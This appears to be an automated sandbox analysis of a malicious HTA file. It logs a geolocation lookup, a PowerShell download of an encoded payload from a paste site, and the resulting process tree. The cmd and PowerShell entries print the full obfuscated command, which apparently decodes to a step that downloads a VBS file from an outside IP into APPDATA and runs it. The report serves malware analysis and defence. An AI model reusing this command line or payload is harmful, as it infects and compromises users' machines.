                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449738172.67.187.2004437776C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-16 06:12:31 UTC67OUTGET /r/pBbD1/0 HTTP/1.1
                                                                                                                Host: paste.ee
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-12-16 06:12:32 UTC1288INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 16 Dec 2024 06:12:31 GMT
                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Cache-Control: max-age=2592000
                                                                                                                strict-transport-security: max-age=63072000
                                                                                                                x-frame-options: DENY
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                CF-Cache-Status: HIT
                                                                                                                Age: 19497
                                                                                                                Last-Modified: Mon, 16 Dec 2024 00:47:34 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E2IMQoxEVd0JuRGt8MNT07NA0uYFyV%2BN%2BU6WU%2Bck13nILH1CT8G82txbjQKqM0le6TW1Y1bzCpzdTDmn1%2By2YoROuTUbmx7uauSdwlavfRtRPARQUkEOh0V25w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f2c85b38b094257-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-12-16 06:12:32 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 34 36 26 6d 69 6e 5f 72 74 74 3d 31 37 33 37 26 72 74 74 5f 76 61 72 3d 36 35 38 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 38 31 30 35 39 26 63 77 6e 64 3d 32 31 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 33 65 33 64 36 65 38 31 61 31 39 36 30 61 36 26 74 73 3d 34 35 35 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1737&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1681059&cwnd=215&unsent_bytes=0&cid=43e3d6e81a1960a6&ts=455&x=0"
                                                                                                                2024-12-16 06:12:32 UTC1235INData Raw: 37 61 39 32 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a
                                                                                                                Data Ascii: 7a92AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 67 44 46 33 77 2f 4e 30 66 44 38 33 77 2b 4e 6f 66 44 32 33 51 39 4e 45 66 44 72 33 51 36 4e 67 65 44 6e 33 67 35 4e 49 65 44 68 33 51 33 4e 63 64 44 56 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77 48 4f
                                                                                                                Data Ascii: gDF3w/N0fD83w+NofD23Q9NEfDr3Q6NgeDn3g5NIeDh3Q3NcdDV3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4wHO
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 44 76 36 51 72 4f 73 71 44 70 36 77 70 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38 4e 73
                                                                                                                Data Ascii: Dv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8Ns
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 34 31 67 64 4e 51 58 44 79 31 41 63 4e 34 57 44 73 31 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c
                                                                                                                Data Ascii: 41gdNQXDy1AcN4WDs1gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoL
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49 65 44
                                                                                                                Data Ascii: 6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIeD
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 41 77 50 68 2f 54 49 2b 41 74 50 47 36 7a 4f 2b 49 54 50 47 33 54 76 39 41 55 50 33 77 44 74 38 6f 32 4f 7a 74 7a 41 36 34 63 4f 65 6e 7a 79 35 4d 55 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 41 64
                                                                                                                Data Ascii: AwPh/TI+AtPG6zO+ITPG3Tv9AUP3wDt8o2OztzA64cOenzy5MUONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAAAd
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 36 55 6a 4f 70 6f 7a 46 35 4d 66 4f 6b 6e 6a 31 35
                                                                                                                Data Ascii: 1M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR6UjOpozF5MfOknj15
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 51 52 4d 75 41 41 41 41 51 44 41 44 41 50 41 2b 4d
                                                                                                                Data Ascii: M4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjByQRMuAAAAQDADAPA+M
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 75 50 61 37 54 31 2b 38 73 50 4a 37 7a 77 2b 34 72
                                                                                                                Data Ascii: JDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+AuPa7T1+8sPJ7zw+4r


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:01:11:58
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:mshta.exe "C:\Users\user\Desktop\clearentirethingwithbestnoticetheeverythinggooodfrome.hta"
                                                                                                                Imagebase:0x6f0000
                                                                                                                File size:13'312 bytes
                                                                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:01:11:59
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:01:11:59
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:01:11:59
                                                                                                                Start date:16/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                                                                                                                Imagebase:0xcb0000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
